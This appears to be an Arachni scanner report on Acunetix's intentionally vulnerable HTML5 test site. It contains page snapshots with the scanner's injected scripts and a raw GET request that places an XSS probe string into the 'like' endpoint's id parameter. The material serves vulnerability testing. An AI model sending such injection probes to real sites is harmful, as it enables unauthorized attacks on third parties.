</div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body ng-pristine ng-valid" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><div class="fb-comments" data-num-posts="4" data-width="470" data-href="http://testhtml5.vulnweb.com/"></div> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
link
input
id
using
GET
at
http://testhtml5.vulnweb.com/
pointing to
http://testhtml5.vulnweb.com/like
.
0 1 2 3 4 | <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"> <i class="icon-thumbs-up" title="Like"> </i> </a> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
link |
http://testhtml5.vulnweb.com/ | http://testhtml5.vulnweb.com/like |
|
|
http://testhtml5.vulnweb.com/like?id=696a3680438a7af53a0a54d3d26469bf%3C/textarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7/%3E%3C!--%3Ctextarea%3E
Raw HTTP request used to retrieve the page.
GET /like?id=696a3680438a7af53a0a54d3d26469bf%3C%2Ftextarea%3E--%3E%3Cxss_0c25785427908905790d3a663dc49fa7%2F%3E%3C%21--%3Ctextarea%3E HTTP/1.1 Host: testhtml5.vulnweb.com Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: 0c25785427908905790d3a663dc49fa7
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->
<link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
